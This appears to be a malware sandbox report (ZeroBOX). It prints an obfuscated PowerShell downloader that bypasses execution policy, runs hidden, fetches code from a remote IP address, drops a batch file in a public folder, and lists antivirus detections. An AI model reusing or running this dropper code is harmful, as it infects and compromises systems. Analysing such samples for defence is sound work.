Static | ZeroBOX
No static analysis available.
$aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:-:59:-:54:-:55:-:59:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:-:59:-:54:-:55:-:59:-:22:-:2c:-:22:-:65:-:72:-:73:-:5c:-:50:-:75:-:62:-:6c:-:22:-:29:-:0a:-:24:-:59:-:47:-:55:-:59:-:47:-:4e:-:55:-:48:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:22:-:2c
$bb = $aa -split ':-:' |ForEach-Object {[char][byte]"0x$_"}
$cc = $bb -join ''
Invoke-Expression $cc
start-sleep -s 7
$Content = @'
p^o^w^e^R^Sh^eLL^.e^X^e ^-e^x^ec^u^tI^o^nP^OLIcY^ ByP^a^S^s -nOProf^I^L^e^ -^WIndoWST^YLe H^i^D^de^N -^E^ JABTAFoAWABEAEMARgBWAEcAQgBIAE4ASgBTAEQARgBHAEgAIAA9ACAAJwBoAHQAdABwADoALwAvADEANAA0AC4AMgAwADIALgAxADAAOQAuADIANAA5AC8AQQAvADMALgB0AHgAdAAnADsADQAKACQARQBEAFIARgBHAEgATgBKAE0ASwBEAEUARgBHAEgASgAgAD0AIAAnAG4ARQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAEUAYgBDACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAVAAnAC4AUgBlAHAAbABhAGMAZQAoACcALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAnACwAJwB0AC4AVwAnACkALgBSAGUAcABsAGEAYwBlACgAJwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACcALAAnAGwASQBFAE4AJwApADsADQAKACQAUwBYAEQAQwBGAFYARwBCAEgATgBKAFgARABDAEYAVgBHAEIASABKAEsAIAA9ACAAJwBEAE8AKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgBhAEQAUwBUADwAPAA8ADwAPAA8ADwAPAA8AD4APgA+AD4APgA+AD4APgA+AD4APgBHACcALgBSAGUAcABsAGEAYwBlACgAJwAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACcALAAnAFcAbgBMAG8AJwApAC4AUgBlAHAAbABhAGMAZQAoACcAPAA8ADwAPAA8ADwAPAA8ADwAPgA+AD4APgA+AD4APgA+AD4APgA+ACcALAAnAHIASQBuACcAKQA7AA0ACgAkAFMAVwBYAEQARQBDAFIARgBHAFkASABVAEoASQBTAE
Set-Content -Path C:\Users\Public\Run\Run.BAT -Value $Content
start-sleep -s 7
$HB='2*-H-53-H-5A-H-58-H-**-H-*3-H-*!-H-5!-H-*7-H-*2-H-*8-H-*E-H-*A-H-53-H-**-H-*!-H-*7-H-*8-H-20-H-3D-H-20-H-27-H-!8-H-7*-H-7*-H-70-H-3A-H-2F-H-2F-H-31-H-3*-H-3*-H-2E-H-32-H-30-H-32-H-2E-H-31-H-30-H-39-H-2E-H-32-H-3*-H-39-H-2F-H-*1-H-2F-H-33-H-2E-H-7*-H-78-H-7*-H-27-H-3B-H-0D-H-0A-H-2*-H-*5-H-**-H-52-H-*!-H-*7-H-*8-H-*E-H-*A-H-*D-H-*B-H-**-H-*5-H-*!-H-*7-H-*8-H-*A-H-20-H-3D-H-20-H-27-H-!E-H-*5-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-*5-H-!2-H-*3-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-5*-H-27-H-2E-H-52-H-!5-H-70-H-!C-H-!1-H-!3-H-!5-H-28-H-27-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-2D-H-27-H-2C-H-27-H-7*-H-2E-H-57-H-27-H-29-H-2E-H-52-H-!5-H-70-H-!C-H-!1-H-!3-H-!5-H-28-H-27-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-2B-H-27-H-2C-H-27-H-!C-H-*9-H-*5-H-*E-H-27-H-29-H-3B-H-0D-H-0A-H-2*-H-53-H-58-H-**-H-*3-H-*!-H-5!-H-*7-H-*2-H-*8-H-*E-H-*A-H-58-H-**-H-*3-H-*!-H
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Trojan.Script.GenericKDZ.3517
FireEye Trojan.Script.GenericKDZ.3517
CAT-QuickHeal Clean
ALYac Trojan.Script.GenericKDZ.3517
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Trojan.Script.GenericKDZ.3517
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Trojan.Script.GenericKDZ.3517
Emsisoft Trojan.Script.GenericKDZ.3517 (B)
Comodo Clean
F-Secure Clean
DrWeb PowerShell.DownLoader.1457
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
GData Trojan.Script.GenericKDZ.3517
Jiangmin Clean
Avira Clean
MAX malware (ai score=85)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.Script.Generic.DDBD
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Clean
AhnLab-V3 Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
Panda Clean
No IRMA results available.